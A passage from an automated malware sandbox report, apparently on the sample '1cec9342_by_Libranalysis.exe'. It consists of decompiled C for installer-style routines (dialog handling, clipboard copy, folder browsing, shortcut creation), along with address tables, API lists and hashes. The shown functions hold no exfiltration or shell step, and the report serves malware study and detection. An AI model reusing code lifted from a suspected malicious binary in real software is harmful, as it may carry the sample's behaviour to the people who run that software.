                                                                                    0x004056d1
                                                                                    0x004056d7
                                                                                    0x004056d7
                                                                                    0x00000000
                                                                                    0x0040563d
                                                                                    0x0040556d
                                                                                    0x00405573
                                                                                    0x004055a1
                                                                                    0x004055a3
                                                                                    0x004055a9
                                                                                    0x004055b4
                                                                                    0x004055b4
                                                                                    0x004055bb
                                                                                    0x00000000
                                                                                    0x004055bb
                                                                                    0x00405577
                                                                                    0x00405581
                                                                                    0x00000000
                                                                                    0x00405545
                                                                                    0x00405545
                                                                                    0x0040554b
                                                                                    0x00405586
                                                                                    0x00000000
                                                                                    0x0040558d
                                                                                    0x00405554
                                                                                    0x0040555b
                                                                                    0x00405560
                                                                                    0x00000000
                                                                                    0x00405560
                                                                                    0x00405543
                                                                                    0x0040537e
                                                                                    0x00405382
                                                                                    0x0040538a
                                                                                    0x0040538e
                                                                                    0x00405391
                                                                                    0x00405394
                                                                                    0x00405397
                                                                                    0x0040539a
                                                                                    0x0040539b
                                                                                    0x0040539c
                                                                                    0x004053b5
                                                                                    0x004053b8
                                                                                    0x004053c2
                                                                                    0x004053d1
                                                                                    0x004053d9
                                                                                    0x004053e1
                                                                                    0x004053e6
                                                                                    0x004053e9
                                                                                    0x004053f5
                                                                                    0x004053fe
                                                                                    0x00405407
                                                                                    0x00405429
                                                                                    0x0040542f
                                                                                    0x00405440
                                                                                    0x00405445
                                                                                    0x00405453
                                                                                    0x00405461
                                                                                    0x00405461
                                                                                    0x00405466
                                                                                    0x00405474
                                                                                    0x00405474
                                                                                    0x00405479
                                                                                    0x0040547c
                                                                                    0x00405481
                                                                                    0x0040548d
                                                                                    0x00405496
                                                                                    0x004054a3
                                                                                    0x004054b2
                                                                                    0x004054a5
                                                                                    0x004054aa
                                                                                    0x004054aa
                                                                                    0x004054be
                                                                                    0x004054be
                                                                                    0x004054d2
                                                                                    0x004054db
                                                                                    0x004054e4
                                                                                    0x004054f4
                                                                                    0x00405500
                                                                                    0x00405500
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetDlgItem.USER32 ref: 004053BB
                                                                                    • GetDlgItem.USER32 ref: 004053CA
                                                                                    • GetClientRect.USER32 ref: 00405407
                                                                                    • GetSystemMetrics.USER32 ref: 0040540E
                                                                                    • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040542F
                                                                                    • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405440
                                                                                    • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405453
                                                                                    • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405461
                                                                                    • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405474
                                                                                    • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405496
                                                                                    • ShowWindow.USER32(?,00000008), ref: 004054AA
                                                                                    • GetDlgItem.USER32 ref: 004054CB
                                                                                    • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054DB
                                                                                    • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054F4
                                                                                    • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405500
                                                                                    • GetDlgItem.USER32 ref: 004053D9
                                                                                      • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                                                    • GetDlgItem.USER32 ref: 0040551C
                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000052F0,00000000), ref: 0040552A
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405531
                                                                                    • ShowWindow.USER32(00000000), ref: 00405554
                                                                                    • ShowWindow.USER32(?,00000008), ref: 0040555B
                                                                                    • ShowWindow.USER32(00000008), ref: 004055A1
                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055D5
                                                                                    • CreatePopupMenu.USER32 ref: 004055E6
                                                                                    • AppendMenuA.USER32 ref: 004055FB
                                                                                    • GetWindowRect.USER32 ref: 0040561B
                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405670
                                                                                    • OpenClipboard.USER32(00000000), ref: 00405680
                                                                                    • EmptyClipboard.USER32 ref: 00405686
                                                                                    • GlobalAlloc.KERNEL32(00000042,?), ref: 0040568F
                                                                                    • GlobalLock.KERNEL32 ref: 00405699
                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056AD
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004056C6
                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 004056D1
                                                                                    • CloseClipboard.USER32 ref: 004056D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 590372296-0
                                                                                    • Opcode ID: 97abd2f5be5f2dae788b800ab975af2d24296fb55a7b09bb9be2c01580a4233f
                                                                                    • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                                                                                    • Opcode Fuzzy Hash: 97abd2f5be5f2dae788b800ab975af2d24296fb55a7b09bb9be2c01580a4233f
                                                                                    • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040460D, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 78%
                                                                                    			E0040460D(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42a068;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E004057F7(0x3fb, _t146);
					E004063D2(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004057F7(0x3fb, _t146);
							if(E00405B7D(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E004060F7(0x429860, _t146);
							_t87 = E00406500(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E004060F7(0x429860, _t146);
								_t89 = E00405B28(0x429860);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429860,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429860) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429860,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405AD6(0x429860);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429860) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404AA1(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42ebfc; // 0x63d143
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404A89(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429850);
									} else {
										E004049C4(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42f4e4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E0040419D(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a880 == _t158) {
									E00404566();
								}
								 *0x42a880 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a890;
							_v60 = E0040495E;
							_v56 = _t146;
							_v68 = E0040618A(_t146, 0x42a890, _t166, 0x429c68, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405A8F(_t146);
								_t125 =  *((intOrPtr*)( *0x42f434 + 0x11c));
								if( *((intOrPtr*)( *0x42f434 + 0x11c)) != 0 && _t146 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
									E0040618A(_t146, 0x42a890, _t166, 0, _t125);
									if(lstrcmpiA(0x42e3c0, 0x42a890) != 0) {
										lstrcatA(_t146, 0x42e3c0);
									}
								}
								 *0x42a880 =  *0x42a880 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405AFC(_t146) != 0 && E00405B28(_t146) == 0) {
						E00405A8F(_t146);
					}
					 *0x42ebf8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E0040417B(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E0040417B(_t166);
					E004041B0(_t165);
					_t138 = E00406500(8);
					if(_t138 == 0) {
						L53:
						return E004041E2(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                                                                                    0x0040460d
                                                                                    0x00404613
                                                                                    0x00404619
                                                                                    0x00404626
                                                                                    0x00404634
                                                                                    0x00404637
                                                                                    0x0040463f
                                                                                    0x00404645
                                                                                    0x00404645
                                                                                    0x00404651
                                                                                    0x00404654
                                                                                    0x004046c2
                                                                                    0x004046c9
                                                                                    0x004047a0
                                                                                    0x004047a7
                                                                                    0x004047b6
                                                                                    0x004047b6
                                                                                    0x004047ba
                                                                                    0x004047c4
                                                                                    0x004047d1
                                                                                    0x004047d3
                                                                                    0x004047d3
                                                                                    0x004047e1
                                                                                    0x004047e8
                                                                                    0x004047ef
                                                                                    0x004047f2
                                                                                    0x00404829
                                                                                    0x0040482b
                                                                                    0x00404831
                                                                                    0x00404836
                                                                                    0x0040483a
                                                                                    0x0040483c
                                                                                    0x0040483c
                                                                                    0x00404858
                                                                                    0x00000000
                                                                                    0x0040485a
                                                                                    0x0040485d
                                                                                    0x0040486b
                                                                                    0x00404871
                                                                                    0x00404872
                                                                                    0x00404875
                                                                                    0x00404878
                                                                                    0x00000000
                                                                                    0x00404878
                                                                                    0x004047f4
                                                                                    0x004047f6
                                                                                    0x004047fa
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004047fc
                                                                                    0x004047fc
                                                                                    0x00404809
                                                                                    0x0040480e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404812
                                                                                    0x00404814
                                                                                    0x00404814
                                                                                    0x0040481c
                                                                                    0x0040481e
                                                                                    0x00404821
                                                                                    0x00404824
                                                                                    0x00404827
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404827
                                                                                    0x00404884
                                                                                    0x0040488e
                                                                                    0x00404891
                                                                                    0x00404894
                                                                                    0x0040489b
                                                                                    0x0040489b
                                                                                    0x0040489d
                                                                                    0x0040489d
                                                                                    0x004048a2
                                                                                    0x004048a4
                                                                                    0x004048ac
                                                                                    0x004048b3
                                                                                    0x004048b5
                                                                                    0x004048c0
                                                                                    0x004048c0
                                                                                    0x004048b5
                                                                                    0x004048c7
                                                                                    0x004048d0
                                                                                    0x004048da
                                                                                    0x004048e2
                                                                                    0x004048fd
                                                                                    0x004048e4
                                                                                    0x004048ed
                                                                                    0x004048ed
                                                                                    0x004048e2
                                                                                    0x00404902
                                                                                    0x00404907
                                                                                    0x0040490c
                                                                                    0x00404915
                                                                                    0x00404915
                                                                                    0x0040491e
                                                                                    0x00404920
                                                                                    0x00404920
                                                                                    0x0040492c
                                                                                    0x00404934
                                                                                    0x0040493e
                                                                                    0x0040493e
                                                                                    0x00404943
                                                                                    0x00000000
                                                                                    0x00404943
                                                                                    0x004047f2
                                                                                    0x004047a9
                                                                                    0x004047b0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004047b0
                                                                                    0x004046cf
                                                                                    0x004046d8
                                                                                    0x004046f2
                                                                                    0x004046f7
                                                                                    0x00404701
                                                                                    0x00404708
                                                                                    0x00404714
                                                                                    0x00404717
                                                                                    0x0040471a
                                                                                    0x00404721
                                                                                    0x00404729
                                                                                    0x0040472c
                                                                                    0x00404730
                                                                                    0x00404737
                                                                                    0x0040473f
                                                                                    0x00404799
                                                                                    0x00404741
                                                                                    0x00404742
                                                                                    0x00404749
                                                                                    0x00404753
                                                                                    0x0040475b
                                                                                    0x00404768
                                                                                    0x0040477c
                                                                                    0x00404780
                                                                                    0x00404780
                                                                                    0x0040477c
                                                                                    0x00404785
                                                                                    0x00404792
                                                                                    0x00404792
                                                                                    0x0040473f
                                                                                    0x00000000
                                                                                    0x004046f7
                                                                                    0x004046e5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004046eb
                                                                                    0x00000000
                                                                                    0x00404656
                                                                                    0x00404663
                                                                                    0x0040466c
                                                                                    0x00404679
                                                                                    0x00404679
                                                                                    0x00404680
                                                                                    0x00404686
                                                                                    0x0040468f
                                                                                    0x00404692
                                                                                    0x00404695
                                                                                    0x0040469d
                                                                                    0x004046a0
                                                                                    0x004046a3
                                                                                    0x004046a9
                                                                                    0x004046b0
                                                                                    0x004046b7
                                                                                    0x00404949
                                                                                    0x0040495b
                                                                                    0x004046bd
                                                                                    0x004046c0
                                                                                    0x00000000
                                                                                    0x004046c0
                                                                                    0x004046b7

                                                                                    APIs
                                                                                    • GetDlgItem.USER32 ref: 0040465C
                                                                                    • SetWindowTextA.USER32(00000000,?), ref: 00404686
                                                                                    • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404742
                                                                                    • lstrcmpiA.KERNEL32(uvlcopdlxoed,0042A890,00000000,?,?), ref: 00404774
                                                                                    • lstrcatA.KERNEL32(?,uvlcopdlxoed), ref: 00404780
                                                                                    • SetDlgItemTextA.USER32 ref: 00404792
                                                                                      • Part of subcall function 004057F7: GetDlgItemTextA.USER32 ref: 0040580A
                                                                                      • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                                                      • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                                                      • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                                                      • Part of subcall function 004063D2: CharPrevA.USER32(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                                                    • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                                                                                      • Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                                                      • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                                                                                      • Part of subcall function 004049C4: SetDlgItemTextA.USER32 ref: 00404A7D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                    • String ID: A$C:\Users\user\AppData\Local\Temp$uvlcopdlxoed
                                                                                    • API String ID: 2624150263-915887145
                                                                                    • Opcode ID: e2093240277334122aeb027a85fba7e6720a3e9e52d6b68153c58a68e5512187
                                                                                    • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                                                                                    • Opcode Fuzzy Hash: e2093240277334122aeb027a85fba7e6720a3e9e52d6b68153c58a68e5512187
                                                                                    • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 74%
                                                                                    			E0040216B() {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405AFC( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\jones\\AppData\\Local\\Temp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}






















                                                                                    0x00402174
                                                                                    0x0040217e
                                                                                    0x00402188
                                                                                    0x00402195
                                                                                    0x004021a0
                                                                                    0x004021a3
                                                                                    0x004021bd
                                                                                    0x004021c3
                                                                                    0x004021c9
                                                                                    0x004021cc
                                                                                    0x004021d6
                                                                                    0x004021da
                                                                                    0x004021da
                                                                                    0x004021df
                                                                                    0x004021f0
                                                                                    0x004021f8
                                                                                    0x004022d4
                                                                                    0x004022d4
                                                                                    0x004022db
                                                                                    0x004021fe
                                                                                    0x004021fe
                                                                                    0x0040220d
                                                                                    0x00402211
                                                                                    0x00402214
                                                                                    0x0040221a
                                                                                    0x00402228
                                                                                    0x0040222b
                                                                                    0x0040222d
                                                                                    0x00402238
                                                                                    0x00402238
                                                                                    0x0040223d
                                                                                    0x0040223f
                                                                                    0x00402246
                                                                                    0x00402246
                                                                                    0x00402249
                                                                                    0x00402252
                                                                                    0x00402255
                                                                                    0x0040225a
                                                                                    0x0040225c
                                                                                    0x00402269
                                                                                    0x00402269
                                                                                    0x0040226c
                                                                                    0x00402278
                                                                                    0x0040227b
                                                                                    0x00402284
                                                                                    0x0040228a
                                                                                    0x00402291
                                                                                    0x004022aa
                                                                                    0x004022ac
                                                                                    0x004022ba
                                                                                    0x004022ba
                                                                                    0x004022aa
                                                                                    0x004022bd
                                                                                    0x004022c3
                                                                                    0x004022c3
                                                                                    0x004022c6
                                                                                    0x004022cc
                                                                                    0x004022d2
                                                                                    0x004022e7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004022d2
                                                                                    0x004022dd
                                                                                    0x00402a5d
                                                                                    0x00402a69

                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp, xrefs: 00402230
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ByteCharCreateInstanceMultiWide
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp
                                                                                    • API String ID: 123533781-47812868
                                                                                    • Opcode ID: 3c5799551ecf467b98758a7772b9f68a95bcaf766b99ab5d6102861f06629b87
                                                                                    • Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
                                                                                    • Opcode Fuzzy Hash: 3c5799551ecf467b98758a7772b9f68a95bcaf766b99ab5d6102861f06629b87
                                                                                    • Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 39%
                                                                                    			E004027A1(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
					E00406055(__edi, _t6);
					_push(_t19 - 0x1a4);
					_push(__esi);
					E004060F7();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                                    0x004027b9
                                                                                    0x004027cd
                                                                                    0x004027d8
                                                                                    0x004027d9
                                                                                    0x00402918
                                                                                    0x004027bb
                                                                                    0x004027bb
                                                                                    0x004027bd
                                                                                    0x004027bf
                                                                                    0x004027bf
                                                                                    0x00402a5d
                                                                                    0x00402a69

                                                                                    APIs
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
